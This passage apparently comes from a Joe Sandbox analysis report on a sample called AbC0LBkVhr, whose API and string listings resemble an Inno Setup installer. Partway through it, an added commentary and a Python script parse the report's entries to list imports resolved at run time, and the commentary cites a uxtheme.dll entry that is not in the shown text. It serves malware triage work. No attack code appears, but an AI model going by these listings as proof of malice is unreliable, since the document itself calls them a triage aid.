• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                          • String ID:
                                                          • API String ID: 1381628555-0
                                                          • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                          • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                          • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                          • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                          APIs
                                                          • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                          • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                          • API String ID: 2000705611-3672972446
                                                          • Opcode ID: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                          • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                          • Opcode Fuzzy Hash: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                          • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                          • API String ID: 1452528299-3112430753
                                                          • Opcode ID: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                          • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                          • Opcode Fuzzy Hash: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                          • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                          APIs
                                                          • GetVersion.KERNEL32 ref: 0045C9FA
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                            • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                          • API String ID: 59345061-4263478283
                                                          • Opcode ID: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                          • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
                                                          • Opcode Fuzzy Hash: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                          • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
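The uxtheme.dll resolver at 0044B677 and the advapi32.dll resolver at 0045C9FA above both follow the same shape: one LoadLibraryA or GetModuleHandleA call, then a run of GetProcAddress calls whose second argument is the symbol name. When triaging a report of this size it helps to pull that list out mechanically rather than reading it entry by entry. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in this page's line format (the "APIs" bullets, optional "Strings" bullets, and the "Similarity" key/value bullets), and for each function lists which library is loaded and which symbols are resolved by name. The excerpt it runs on is constructed from the two entries above and abbreviated; the ACL_APIS watchlist (the pair that rewrites object ACLs) is the example's own choice, not something the report defines.

```python
"""Extract run-time import resolution from Joe Sandbox function entries.

Added example; not part of the Joe Sandbox report or its tooling. It reads the
report's per-function text blocks ('APIs' lines of the form
'• Func.MODULE(args), ref: ADDR', optional 'Strings' lines ending in
', xrefs: ADDR', and the 'Similarity' key/value bullets) and lists, for each
function, which library it loads and which symbols it resolves by name.
"""
import re

# Constructed excerpt in the report's line format, abbreviated from the
# uxtheme.dll and advapi32.dll resolver entries (not a verbatim copy).
SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: OpenThemeData$SetWindowTheme$uxtheme.dll
• API String ID: 1968650500-2910565190
• Opcode ID: 6c67b19e
• Instruction Fuzzy Hash: 679198F0A40B11EB
APIs
• GetVersion.KERNEL32 ref: 0045C9FA
• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
  • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000), ref: 0045C961
• AllocateAndInitializeSid.ADVAPI32(?,?,?), ref: 0045CAFB
Strings
• GetNamedSecurityInfoW, xrefs: 0045CA27
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$advapi32.dll
• API String ID: 59345061-4263478283
• Opcode ID: d4e9dcdd
• Instruction Fuzzy Hash: C25186B1D00308EF
"""

# '• [Part of subcall function ADDR: ]Func.MODULE[(args)][,] ref: ADDR'
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
STR_RE = re.compile(r"^•\s*(?P<s>.*), xrefs:\s*(?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*(?P<k>[\w ]+):\s*(?P<v>.*)$")

LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}
# Watchlist is this example's own choice: the pair that rewrites object ACLs.
ACL_APIS = {"SetNamedSecurityInfoA", "SetNamedSecurityInfoW",
            "SetEntriesInAclA", "SetEntriesInAclW"}

SECTION_HEADERS = ("APIs", "Strings", "Similarity", "Memory Dump Source", "Joe Sandbox IDA Plugin")


def _new_entry():
    return {"apis": [], "strings": [], "meta": {}}


def parse_entries(text):
    """Split report text into per-function entries. An entry ends at its
    'Instruction Fuzzy Hash' bullet, the last line the report prints for it."""
    entries, cur, section = [], _new_entry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
                cur["apis"].append({"func": m.group("func"), "module": m.group("mod"),
                                    "args": args, "ref": m.group("ref"), "subcall": m.group("sub")})
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                cur["strings"].append((m.group("s"), m.group("ref")))
        elif section == "Similarity":
            m = KV_RE.match(line)
            if m:
                cur["meta"][m.group("k")] = m.group("v")
                if m.group("k") == "Instruction Fuzzy Hash":
                    entries.append(cur)
                    cur, section = _new_entry(), None
    if cur["apis"] or cur["meta"]:
        entries.append(cur)  # trailing entry with no closing hash line (truncated page)
    return entries


def dynamic_imports(entry):
    """Return (libraries, symbols): library names passed to LoadLibrary/GetModuleHandle
    and symbol names passed as the second GetProcAddress argument."""
    libs, syms = [], []
    for call in entry["apis"]:
        if call["func"] in LOADERS and call["args"]:
            libs.append(call["args"][0])
        elif call["func"] == "GetProcAddress" and len(call["args"]) >= 2:
            syms.append(call["args"][1])
    return libs, syms


def summarize(text):
    """One row per function that resolves imports by name, keyed by its first ref."""
    rows = []
    for e in parse_entries(text):
        libs, syms = dynamic_imports(e)
        if not syms:
            continue
        rows.append({
            "ref": e["apis"][0]["ref"],
            "libraries": libs,
            "symbols": syms,
            "acl_apis": sorted(set(syms) & ACL_APIS),
            "api_string_id": e["meta"].get("API String ID", ""),
        })
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE_REPORT):
        print(row["ref"], row["libraries"], len(row["symbols"]), "symbols; ACL:", row["acl_apis"])
```

Run against the full report text, the rows give a quick map of which functions resolve what, and the "API String ID" column lets the same function be matched across reports of related samples. The caveat: both resolvers here are consistent with an ordinary Inno Setup stub (compare the Inno-Setup-RegSvr-Mutex entry above), which themes its dialogs through uxtheme.dll and adjusts file ACLs through advapi32.dll, so a resolved-symbol list is a triage aid for diffing against a known-clean stub, not a verdict on its own.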
                                                          APIs
                                                          • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                          • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                          • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                          Strings
                                                          • IPropertyStore::Commit, xrefs: 0045677D
                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                          • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                          • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                          • IPersistFile::Save, xrefs: 004567FC
                                                          • CoCreateInstance, xrefs: 004565AB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance$FreeString
                                                          • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                          • API String ID: 308859552-3936712486
                                                          • Opcode ID: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                          • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                          • Opcode Fuzzy Hash: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                          • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
                                                          APIs
                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                          • 73A1A480.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                          • String ID:
                                                          • API String ID: 359944910-0
                                                          • Opcode ID: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                          • Instruction ID: 33ab0b3d7217a913ee79b1f77f60082389afcfeada11791300d2e7ee1e5313f5
                                                          • Opcode Fuzzy Hash: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                          • Instruction Fuzzy Hash: FC41BC71E44619AFDB10DAE9C946FEFB7BCEB08704F104466B614F7281D678AD408BA8
                                                          APIs
                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                          • API String ID: 971782779-3668018701
                                                          • Opcode ID: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                          • Instruction ID: fd1e6c444996228d4851cdbb4885a0c41f61386fce8022a34f2115261328fc48
                                                          • Opcode Fuzzy Hash: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                          • Instruction Fuzzy Hash: 06D13574A001499FDB11EFA9D981BDEBBF4AF08304F50806AF904B7392D778AD45CB69
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                          • , xrefs: 004548D2
                                                          • RegOpenKeyEx, xrefs: 004548E4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$FormatMessageOpen
                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                          • API String ID: 2812809588-1577016196
                                                          • Opcode ID: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                          • Instruction ID: ff4e522da132bb0e31d6f3ae6b90b680e2e6169bdaf0a1bf0a59660f44ee0e74
                                                          • Opcode Fuzzy Hash: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                          • Instruction Fuzzy Hash: 5B912571E44108ABDB40DFD5D942BDEB7F8EB48309F10406AF900FB682D6789E459B69
                                                          APIs
                                                            • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                          Strings
                                                          • v4.0.30319, xrefs: 00459311
                                                          • .NET Framework version %s not found, xrefs: 00459429
                                                          • v2.0.50727, xrefs: 0045937B
                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                          • .NET Framework not found, xrefs: 0045943D
                                                          • v1.1.4322, xrefs: 004593E2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Close$Open
                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                          • API String ID: 2976201327-446240816
                                                          • Opcode ID: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                          • Instruction ID: b06f59bb3d6be91165b8bdbc27cbaff9901adf20ec6b7ffb5bff20868c6d7bc9
                                                          • Opcode Fuzzy Hash: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                          • Instruction Fuzzy Hash: 7F51A131A04144EBCB00DFA988A17EE77B6DB49305F54447BE800DB382E63D9E0ACB58
                                                          APIs
                                                          • CloseHandle.KERNEL32(?), ref: 0045889B
                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                          • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                          Strings
                                                          • Helper isn't responding; killing it., xrefs: 004588A7
                                                          • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                          • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                          • Helper process exited., xrefs: 004588E5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                          • API String ID: 3355656108-1243109208
                                                          • Opcode ID: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                          • Instruction ID: 5c1f132ce02699e8ecfae473a4aa832f70e08e49b07aa2054fbd8a494dc4d87a
                                                          • Opcode Fuzzy Hash: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                          • Instruction Fuzzy Hash: 582171706087409AD710E779C44575BB6D4AF48309F00C82FB9DAD7693DE7CE8488B6B
                                                          APIs
                                                            • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                          Strings
